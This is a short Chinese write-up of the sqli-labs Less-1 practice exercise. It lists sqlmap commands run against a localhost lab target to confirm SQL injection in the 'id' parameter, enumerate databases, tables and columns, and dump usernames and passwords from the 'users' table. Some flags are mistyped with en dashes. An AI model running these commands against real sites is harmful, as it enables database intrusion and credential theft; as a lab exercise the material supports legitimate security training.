使用sqlmap脚本工具的sqli-less1题解
1.检测当前注入点,测试表明GET参数ID可能是可注入型的
sqlmap.py -u http://localhost/sqli/Less-1/?id=1
2. 找出所有的数据库名
sqlmap.py -u http://localhost/sqli/Less-1/?id=1 --dbs
3.查看数据库中的表
sqlmap.py -u http://localhost/sqli/Less-1/?id=1 -D security --tables
4.查看当前数据库的users列
sqlmap.py -u http://localhost/sqli/Less-1/?id=1 -D security -T users
–column
5.查看列中字段中的值
sqlmap.py -u http://localhost/sqli/Less-1/?id=1 -D security -T users
-C username,password –dump